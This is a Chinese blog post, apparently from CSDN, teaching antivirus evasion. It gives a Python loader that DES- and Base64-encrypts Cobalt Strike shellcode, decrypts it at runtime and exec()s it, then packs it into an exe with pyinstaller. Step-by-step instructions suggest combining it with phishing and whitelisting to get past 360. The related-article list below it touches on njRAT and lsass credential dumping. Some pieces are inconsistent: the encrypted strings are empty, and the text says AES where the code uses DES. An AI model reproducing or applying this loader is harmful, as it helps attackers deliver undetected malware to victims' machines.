免杀exe技术探讨

最新推荐文章于 2024-02-20 17:45:00 发布
最新推荐文章于 2024-02-20 17:45:00 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 安全 免杀 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/125876233
版权

前言:

本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

最近把大部分的语言的捣鼓分析了下
c的python的 rust的 go的常见的语言市面上有的都研究了下也写了一下自己的 发觉python的确实可以说是最简单的了,不过其实深入免杀的话 还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了 终究有些行为还是会呗动态杀
这篇分享一篇python的吧 效果看正文 全过的也有 不过现在肯定是不会发的

正文:

最开始的
在这里插入图片描述
更改后的
原理:核心还是对shellcode和loader进行加密处理 当然分离肯定也是可以的不过为了防止溯源我觉得这种其实也还行
DES+Base64
shellcode加密

import binascii 
from pyDes import des, CBC, PAD_PKCS5 
# 需要安装 pip install pyDes 
 
def des_encrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    en = k.encrypt(s, padmode=PAD_PKCS5) 
    return binascii.b2a_hex(en) 
 
def des_decrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) 
    return de 
 
secret_str = des_encrypt('12345678', 'I love YOU~') 
print(secret_str) 
clear_str = des_decrypt('12345678', secret_str) 
print(clear_str)

加载器loader

# -*- coding:utf-8 -*-
import ctypes
import base64
import binascii 
from pyDes import des, CBC, PAD_PKCS5 

def des_decrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) 
    return de
    
if __name__ == '__main__':
    shell_code =des_decrypt('12345678','') 
    shell_code=str(shell_code,encoding='utf-8')
    shellcode1=base64.b64decode(shell_code)
    shellcode=shellcode1.decode().replace('&','c4d8686d9fcabdc94c0fc30b4dfe35c96c70ec9c5bbe538f268cc9c826e27dea25de33d121bf553843593aac8ef0f08b50d70de08efa8c21448256e8e1297726919f6ad3a85a046a7517fc95399626c78a5c2d78b901bf396f348eda70e532e42ec9bfb8e5f13456e745614483a737ab16776061538df48eb82a54c5f9112b76b88b67bf2d960f29ae39cf5a62bc59520d5e364447dd29aa5d8484cc3a102bf4ee3ff2e8375756615e385d5b29113e4e8a5e3d2cd66dfc67a4deb0e38d5908cd498435484b09a0eafbafb8165352fa6bfa4b8fd58ef932c0c7777842b641fc05071302ba1172c6a427f78038cb3eec555a75ecc3c46699edbd0b27466ffd5590eef70d079046b72a6ba260b173d63efd2e12f3691f27061c4942a722b019c44634b93c296611c7ddf1ffabee8daa8d50500ba19ec05aa9ce2b703ec1eecde089142c4022489adc4c816480ac57ebc4b26178ea75d47a48a99ac1b7dc4b9553a47aeff63e9e7fc20be4a785ecaba59a57ea9316b32023bb512464eca5400ed0d0f5822052d263226bdf703bd5422bf914d6770751c6af62c3ee69d02deea7e0caa50f28a0ec6d840df7be10b2c70ab6b29ad40b660478dddbf0c3f453b755a510dc56772c9dccfb6a3a7abf183ec41d389045b260b9bc619c626b6dcdeb388b23d1cf372e3c7262c1d1688820d9738296536e0ea46d38d6979b250661a572335abfd79a23c86b250510f2c8a82660bfa47f855ec0a3c8c809598314acb06fdc6870a7cbfd38fd64023b374b750f1b7888d632b9cfa2b577718931254bd63fa1d7f0de341b02e631fc871b202e2fb426b0d7716ace7bdd44bc6b7753102e379188dabae27534fe37312f765b6895a03146b01320e30cd2ae62e9330d6312da137fc34ee2210f8dadbcd7b20e9de224d6511f726906a8e28c2b05b6154f44c3d918')
    shellcode = bytes.fromhex(str(shellcode))
    loader =des_decrypt('12345678','')     
    loader=str(loader,encoding='utf-8')
    loader1=base64.b64decode(loader)
    loader2=loader1.decode().replace('&','')
    exec(loader2)

vt的过不全
在这里插入图片描述
使用方法
1.cs去整个shellcode下来
在这里插入图片描述
2.处理生成的shellcode
将\x替换为空
在这里插入图片描述
得到如下
在这里插入图片描述
3.把上面的拿去进行base64加密
在这里插入图片描述
4.把得到的base64进行aes加密得到aes加密的
在这里插入图片描述
5.把这个数字扔进loader里面去
在这里插入图片描述
6.进行编译为exe
pyinstaller -F cs.py
点击上线即可 组合钓鱼的手法就可以很完美了
在这里插入图片描述

命令执行一样的
在这里插入图片描述
当然高危动作肯定被360杀这是这种免杀的特点 想绕的话使用专门的白名单和相应的手法去执行就好了

goddemon
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
论过360免杀技术探讨
06-01
论过360免杀技术探讨 MD5 碰撞算法伪装木马,躲过杀毒软件查杀,加入360白名单。 关于MD5碰撞,及360的信任列表隐患。
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1126
1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
简单快捷的 CS 一键免杀插件 CSx3Ldr
最新发布
yutianovo的博客
02-20 550
Cobalt Strike插件
免杀】木马免杀制作
qq_48201589的博客
03-25 1180
免杀就是指能够使病毒木马逃避杀毒软件检测的一种技术。总体来讲,免杀分为静态免杀和动态免杀,静态免杀基于特征值,而动态免杀则是基于行为。这里我们讲Cobalt Strike生成Python木马,免杀绕过火绒。
免杀方法(九)msf加密壳免杀
qq_56426046的博客
10-04 484
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
Exp3-免杀原理与实践-20202127
qq_57435798的博客
03-29 500
本此实验遇到的比较大的问题就是veil的安装,当时反复出现wine32缺失的报错,按照系统给的命令操作之后,却又一直卡在某一行,我也不知道是这一步就应该等待这么久还是我的操作出现了问题,反复多次尝试之后,我在操作到那一步之后,出去吃了顿晚饭,回来之后就惊喜地发现veil已经安装完毕,由此,我也确定了我的操作并没有问题,只是确实需要等待很久。同时,由于恶意代码也会随着科技进步发展变化,只能说是最大程度地去防止恶意代码,而且不同的杀软有不同的性能,对于恶意代码的防范也有一定的局限性,所以绝对是很难做到的!
5G安全与管控技术探讨 .pptx
05-29
5G安全与管控技术探讨,主要介绍相关需求,方案、对需要刚刚接触5有帮助,对初步了解5G技术有帮助;对5G技术的安全技术进行探讨
计算机网络安全防范技术探讨.pdf
11-16
计算机网络安全防范技术探讨.pdf
“大型”网站技术架构探讨
09-25
“大型”网站技术架构探讨
探讨公路交通信息技术论文.doc
12-21
探讨公路交通信息技术论文.doc
厉害!免杀任意EXE
南迪叶先森
07-06 2873
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! PE文件 PE文件简述 PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL),这篇文章主要讲对EXE文件进行内存加载并运行的方法,代码实现,和完成一个GUI加载器工具的全过程。 文件结构 由上图可以 Dos Header 是用来兼容MS-DOS操作系统的,目的是当.
Python免杀技术详解
weixin_68789096的博客
11-02 941
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
微软自带签名exe免杀dump hash
weixin_44747030的博客
04-16 1242
微软签名DumpMinitool.exe免杀dump hash 微软签名的exe dump lsass进程 DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full --file 保存文件名为1.txt 规避一下杀软 --processId lsass.exe 进程号 杀软无拦截 查看1.dmp sekurlsa::minidump "1.dmp" sekurlsa::logonpasswords 参考文章:https://
linux之shell 输入输出
cuichangzhi5476的博客
01-24 152
如果希望创建一个新文件,并向其中输入一些内容,只需使用cat命令把标准输出重定向到该文件中,这时cat命令的输入是标准输入—键盘,你输入一些文字,输入完毕后按< C T R L - D >结束输入。这真是一个非常简单...
一个菜鸡的免杀之路(一)
m0_59598029的博客
09-09 50
作为一个web狗,对免杀这块是一直没办法深入学习,在恶补了些二进制基础后,开启了我的免杀之路(doge)
python学习笔记——pythonexe免杀
小橙子的博客
07-07 801
思路: 将敏感代码转码,使用时解码再执行。 参考: https://blog.csdn.net/qq_32261191/article/details/108994177 一、敏感代码使用base64编码 #-*- coding: utf-8 -*- import base64 str = """ print('123') """ #编码 encode = base64.b64encode(str.encode('utf-8')) print(encode) 结果: b'CnByaW50
实现免杀:Shellcode的AES和XOR加密策略(vt查杀率:4/70)
xf555er的博客
05-24 1747
XOR加密又称为异或加密,异或加密属于对称加密。在异或加密中,使用一个密钥(通常称为密钥流)与明文数据进行异或操作,生成加密后的密文。解密过程与加密过程相同,将密文与相同的密钥流进行异或操作,即可恢复原始明文数据AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
红蓝对抗经验分享:CS免杀姿势
A_991128a的博客
08-14 229
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。接下来我将给各位同学划分一张学习计划表!
数据中心IT设备硬件级监控技术探讨
03-21
对于数据中心IT设备硬件级监控技术探讨,可以考虑使用传感器、监控软件、远程管理工具等技术手段,实现对硬件设备的实时监控、故障预警、性能优化等功能。同时,还需要考虑数据安全、隐私保护等方面的问题。具体...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值